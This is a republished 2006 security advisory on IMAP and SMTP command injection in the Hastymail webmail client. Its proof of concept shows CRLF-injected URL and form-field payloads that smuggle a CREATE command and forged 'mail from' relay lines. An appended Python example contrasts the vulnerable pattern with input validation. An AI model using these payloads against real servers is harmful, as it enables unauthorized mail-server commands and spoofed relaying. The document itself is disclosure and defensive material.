ISAA-2006-011.txt

06 Dec 2006 | Reported by Vicente Aguilera Diaz | Type: packetstorm | Source: packetstormsecurity.com

IMAP/SMTP Injection in Hastymail can lead to unauthorized commands and exploit mail server vulnerabilities

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-011  
- Original release date: September 28, 2006  
- Last revised: December 1, 2006  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 3/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
IMAP/SMTP Injection in Hastymail.  
  
II. BACKGROUND  
-------------------------  
Hastymail is yet another webmail IMAP client written in PHP. Hastymail  
is designed for speed, RFC compatibility, simplicity, and security.  
Our goal is to create a simple interface with powerful but easy to use  
options that make managing your IMAP account effective and fast.  
  
Hastymail is NOT groupware. We are focused on being a functional and  
fast webmail client.  
  
The product homepage is http://hastymail.sourceforge.net/  
  
III. DESCRIPTION  
-------------------------  
Hastymail provides a graphical interface to interact with mail servers  
across the IMAP/SMTP protocols.  
  
Hastymail does not properly validate the commands and data it sends  
to the mail servers during normal use of the application (for  
example, when accessing a mailbox). An authenticated malicious user  
can therefore inject arbitrary IMAP/SMTP commands into the mail  
servers used by Hastymail through parameters that the webmail  
front-end uses in its communication with these mail servers.  
  
This becomes dangerous because the injection of these commands  
allows an intruder to evade restrictions imposed at application level,  
and exploit vulnerabilities that could exist in the mail servers  
through IMAP/SMTP commands.  
  
IV. PROOF OF CONCEPT  
-------------------------  
== IMAP Injection example (1.5 version) =============  
Hastymail Vulnerable parameter: "mailbox" (and possibly others)  
  
When a user accesses a folder (for example, "INBOX"), he creates a  
GET request such as:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX  
  
A malicious user can modify the value of the "mailbox" parameter and  
inject any IMAP command.  
The IMAP command injection has the following structure:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX  
Note that double URL encoding has been used to encode  
the quote character (").  
  
Example:  
Injection of the CREATE IMAP command across the "mailbox" parameter:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE  
%2522INBOX.vad  
  
== SMTP Injection example (1.5 version) =============  
Hastymail Vulnerable parameter: "subject" (and possibly others)  
  
When a user sends a message, he creates a POST request like:  
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept  
-----------------------------84060780712450133071594948441  
...  
  
A malicious user can modify the value of the "subject" parameter and  
inject any SMTP command.  
Example: Relay from a non-existent e-mail address  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept  
.  
mail from: [email protected]  
rcpt to: [email protected]  
data  
This is a proof of concept of the SMTP command injection in Hastymail  
.  
  
-----------------------------84060780712450133071594948441  
...  
  
V. BUSINESS IMPACT  
-------------------------  
The IMAP/SMTP command injection allows an attacker to exploit  
vulnerabilities in the IMAP/SMTP servers and evade all the  
restrictions at the application layer.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
This vulnerability has been tested in:  
- Last development version: 1.5, released on February 17, 2006  
- Last stable version: 1.0.2, August 23, 2004  
  
Possibly all versions are affected by this vulnerability.  
  
VII. SOLUTION  
-------------------------  
Apply the patch: http://hastymail.sourceforge.net/security.php  
  
VIII. REFERENCES  
-------------------------  
http://hastymail.sourceforge.net/security.php  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).  
  
X. REVISION HISTORY  
-------------------------  
September 28, 2006: Initial release  
October 3, 2006: Project admin response  
October 9, 2006: Project admin published the patch for 1.5 and 1.02  
versions.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
September 28, 2006: Vulnerability acquired by Vicente Aguilera Diaz  
Internet Security Auditors (www.isecauditors.com)  
December 1, 2006: Advisory published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
`
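
The flaw class the advisory describes, and the input handling that closes it, as an added example that is not Hastymail's code or its patch. All function names are hypothetical, and the two sample inputs are constructed to match the shape of the decoded "mailbox" and "subject" values in the proof of concept.

```python
import re

CTL = re.compile(r"[\r\n\x00]")  # characters that end or corrupt a protocol line


class UnsafeInput(ValueError):
    """Raised when user input would break out of a single protocol line."""


def select_unsafe(tag, mailbox):
    # Flaw class from the advisory: the value is pasted between quotes unchanged.
    return f'{tag} SELECT "{mailbox}"\r\n'


def imap_quoted(value):
    # RFC 3501 quoted string: CR, LF and NUL are not allowed; \ and " are escaped.
    if CTL.search(value):
        raise UnsafeInput("control character in IMAP argument")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def select_safe(tag, mailbox):
    return f"{tag} SELECT {imap_quoted(mailbox)}\r\n"


def header_value(text):
    # A Subject taken from a form field must stay on one line.
    if CTL.search(text):
        raise UnsafeInput("line break in header value")
    return text


def smtp_data(message):
    # RFC 5321 section 4.5.2: normalise line endings and dot-stuff, so a lone "."
    # inside the message can never terminate the DATA phase early.
    lines = re.split(r"\r\n|\r|\n", message)
    stuffed = ["." + ln if ln.startswith(".") else ln for ln in lines]
    return "\r\n".join(stuffed) + "\r\n.\r\n"


def commands(wire):
    # Number of CRLF-terminated lines the server would read.
    return wire.count("\r\n")


# Constructed inputs, shaped like the decoded parameters in the proof of concept.
MAILBOX = 'INBOX"\r\nA0003 CREATE "INBOX.vad'
SUBJECT = "Proof of Concept\r\n.\r\nmail from: a@example.test"
```

Validation has to run on the value after every decoding step the application performs, since the proof of concept relies on double URL encoding to get the quote character past the first decode.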
